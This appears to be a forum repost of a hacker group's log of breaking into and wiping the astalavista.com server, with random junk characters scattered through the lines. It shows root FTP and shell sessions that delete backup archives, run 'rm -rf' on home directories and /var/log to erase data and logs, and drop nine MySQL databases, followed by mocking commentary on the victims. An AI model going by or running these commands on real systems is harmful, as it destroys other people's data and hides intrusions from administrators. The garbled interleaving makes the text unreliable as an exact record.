dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com( |1 K' i! W. t3 [+ _
226 Transfer complete.
( _# N1 z9 Y" W @8 P$ Q/ Bftp> cd astalavista.com' r/ I9 G3 s: H7 G1 T4 w/ \
250 CWD command successful.- t- u" l$ |; ? ?
ftp> ls -la. q! A0 V7 y4 g
227 Entering Passive Mode (212,254,194,163,2,189)
3 H J. u. B# X& Y. K1 _150 Opening BINARY mode data connection for ‘file list’.
% z6 E% Q- r+ v$ X9 y-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
- a1 i/ E+ s9 q: H0 s9 o* M+ m-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz20 h) N" v1 e8 \( H P H5 i
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz22 A: r) R/ i. M8 \0 a% P
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
5 z' K/ Q/ W- p3 a* T( O-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
6 `# T$ Y6 i; X1 r1 c' q[snip]% P3 a1 K+ L! ]9 V' M
226 Transfer complete.
& f3 j9 t5 o+ \ftp> mdelete *; ]. i$ F# v6 Z, m8 I+ t
ftp> ls -la
: a' c: V2 I. e227 Entering Passive Mode (212,254,194,163,2,193)" i6 u: R7 Q7 d& y! t
150 Opening BINARY mode data connection for ‘file list’.# Y& ^3 e9 M' C
226 Transfer complete.
4 f. s' B) @+ Z% O# v$ dftp>
$ f5 p4 R) k+ ~! c& b2 @# n2 [/ d# P
sh-3.2# cd /home% X' Z+ b! t; G; V+ U) P
sh-3.2# ls -la
% n: i/ s0 |3 a1 i( V* Rtotal 120/ c# F s" n7 Z; R8 w
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .( ?- S- x; j5 K: E- U; e4 s
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
3 ]+ n8 Q7 {' a) Adrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
) X$ j! i. M3 n" o0 Q; q-rw——- 1 root root 8192 Jun 4 03:03 aquota.group3 \4 Q# A7 q# d/ h/ H3 O
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user, i: a1 S! y8 z- ~ c& D
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet/ o, f& e* c9 ]7 t# r( [
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
& g" U6 O- q& N4 H) T% ?+ n6 Cdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
1 d9 U5 v% v" f3 a: b4 Y* ]3 Ndrwx–x–x 10 com com 4096 Apr 28 12:40 com
( T- H9 w9 M: b( n3 edrwxr-xr-x 2 root root 4096 May 17 2007 ftp3 t( ^3 M3 Y, m. o9 K: ^ @
drwx—— 3 jon jon 4096 Sep 21 2007 jon, V! a* y. _; L
drwx—— 2 root root 16384 Sep 11 2007 lost+found) `3 ]" u, i3 {9 _& Y
drwxr-xr-x 2 root root 4096 Sep 14 2007 my4 G# ^" Q/ f7 c
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
0 j8 o2 G, N b- K/ Sdrwx—— 2 jon jon 4096 Sep 15 2007 test
0 ^8 R" Z; ~1 x2 }drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp9 }: M- Z+ v* F* |) r4 s/ y
% m) l; N F3 m9 c; p; I% U; ^9 S7 F7 `sh-3.2# rm -rf backup/
* C2 ^0 D( M! @* O2 qsh-3.2# rm -rf backup.14161/
7 ? \- A$ l q) X, n7 J6 u4 dsh-3.2# rm -rf ftp/( [) |" y1 R7 M
sh-3.2# rm -rf jon/
; U: l8 A6 n$ \2 ?5 O" p5 W# \* h3 ssh-3.2# rm -rf my/ t% j0 Q# R# v! w
sh-3.2# rm -rf mysqldata/& Y. v; l9 \* o9 Z; d
sh-3.2# rm -rf test/
* S4 Z$ b6 @0 Z7 u8 d# V7 vsh-3.2# rm -rf tmp/
+ J! c* J8 Z. }sh-3.2# cd ~+ c K3 @6 K: U$ N
sh-3.2# rm -rf *& l# q& b Q% W* K. S. f6 [, s+ S
sh-3.2# rm -rf /var/log/
4 H: m/ E. g" W$ q- Crm: cannot remove directory `/var/log//proftpd’: Directory not empty' n7 f% y5 t. X/ x' d- U% f7 Z2 }
sh-3.2# rm -rf /home/*( o5 V, n$ d. s2 P/ ?4 b& L
sh-3.2# mysql2 K3 s; s' u0 w& N
Welcome to the MySQL monitor. Commands end with ; or \g.
! v; S' w# U8 k: e; U; CYour MySQL connection id is 407156
2 ]* C; y+ n8 l/ wServer version: 5.0.45-community-log MySQL Community Edition (GPL)
$ Y/ Y; J. U' e+ [' V+ O8 ]' W* l4 _, o( @. E9 R6 f
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.* M! l$ ~) s- `6 W: m% l
7 }, G- Q# r8 n9 d7 i$ T" }mysql> show databases; h: V" X) e0 J7 K% p" X
+———————–+
5 S: x" L0 p0 \% w| Database |
: K) \# G7 F4 J" K5 l3 m! y+———————–++ J4 [3 E# n I* }! X) f( U
| information_schema |
6 r& q6 C$ y) u9 l/ a/ V| astanet_ads |
: g/ B2 Y9 a: ?# n2 n6 d| astanet_mailing_lists |' F/ g0 h& z8 \2 [
| astanet_mediawiki |. l" ]# U+ |% E: R" V/ ?4 G' l7 E
| astanet_membersystem |4 J4 K) r& A% \; l( f6 D
| com_contrexx | s) M7 I8 z( K- ~
| com_contrexx2 |
: i- |9 W1 c' h7 R5 x$ I2 m| com_contrexx2_live |
! y! c- l5 m$ c8 _6 ]: R( S| da_roundcube |6 J4 \! E+ L4 ]/ ]& s
| dolphin |: I* ~3 V+ V' W6 p6 Y0 O
| ideapool |* |) Y4 e* W7 H9 m8 A- |
| mysql |
$ n1 C! m2 x R- V2 F9 |/ ?, i8 G| test |
4 G4 M( U, J) P$ j0 W" S| yourmaster |
5 W; t! K6 [# Q: t+———————–+# p) l# R' l3 G& A2 Q( k
14 rows in set (0.03 sec)3 I' |. a F$ a
% B4 H$ W# Q( ]! j' U8 {
mysql> drop database astanet_membersystem;% M. _* C4 j" z/ u( [& @$ q
droQuery OK, 46 rows affected (0.81 sec)
) Y4 U' e' q! M: ?7 M( o
w; y: \0 E! V& n+ Hmysql> drop database com_contrexx;% I) E1 D7 r+ }4 c; ~ A
Query OK, 211 rows affected (2.72 sec)1 ^' o6 l) D& Z. h
7 b X- e8 ]' ?" h8 \
mysql> drop database com_contrexx2;
# g6 _' p: P& _, m& QQuery OK, 237 rows affected (2.23 sec)4 l' z1 R7 v6 p) M q8 I+ N1 @0 V
, x4 y1 h- X) B0 _; g2 ]# D f. qmysql> drop database com_contrexx2_live;6 y+ K8 {% w* r4 [8 x
Query OK, 227 rows affected (7.63 sec)- q% }# P8 y- h. f9 ^8 o
. q* ?* e' L3 Y* k$ k5 Y
mysql> drop database ideapool;
. y- i* o" f- \' Q. e0 U; XQuery OK, 69 rows affected (0.19 sec)
) t4 g) v" r0 Q$ d% V8 j$ v
, l; s/ F3 l" {1 X) p smysql> drop database yourmaster;
/ ?" q, Z! I' t1 G6 IQuery OK, 158 rows affected (0.55 sec)
. G4 g3 {( V8 H% K
8 A0 V0 W( F# ^3 n( _) W+ kmysql> drop database astanet_ads;
9 D% \/ _" \, EQuery OK, 9 rows affected (0.11 sec)( c. U( g; y" A9 w; B' [
x$ A7 ?- ]$ s8 d
mysql> drop database astanet_mailing_lists;
' n$ h3 E( n3 t+ `$ z7 f, D# }8 dQuery OK, 24 rows affected (1.47 sec)0 Y! d) H) ~' A" q
7 Q4 x( `0 U& f& [. r( J, S
mysql> drop database astanet_mediawiki;
# [$ C9 p8 i: j2 k! F; B6 v L) BQuery OK, 31 rows affected (0.51 sec)
1 d1 c5 D0 t- d3 N& W5 B& o8 P& x
X$ ^9 Y& {& J ]mysql> show databases;& S: U8 K/ N- J. K* {
+——————–+
9 P9 i3 ]# E, S2 v% X| Database |
; R/ I6 C; d3 a( X! b$ {+——————–+
5 L, L* T: g! N, e# v| information_schema |/ ^# w6 ~+ B, B9 Q& ^
| da_roundcube |( Z& U) \8 ]3 N }/ f1 e
| dolphin |
0 A$ g1 T, u6 |3 x| mysql |$ r' g9 v7 P; }3 O* N" g
| test |
" ?) v5 L4 v9 [3 `4 M5 f7 {1 w" \8 _( |+——————–+; }/ t5 x; p' M4 ]3 l
5 rows in set (0.00 sec)
5 g( F. G7 i% z! A9 J4 c3 J( Q- E1 t r5 m8 P* f
What a journey! We’re not sure exactly why the “Terminator” had any influence on# E% t* j8 U+ X* X
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the, p. u4 E% X+ G, t4 b; n
wrong to say this pack of morons *wont be back*.
Z2 Z; W- Y& r; o9 A! X$ \. K |
发表于 2012-11-6 21:07:34
收藏
支持
反对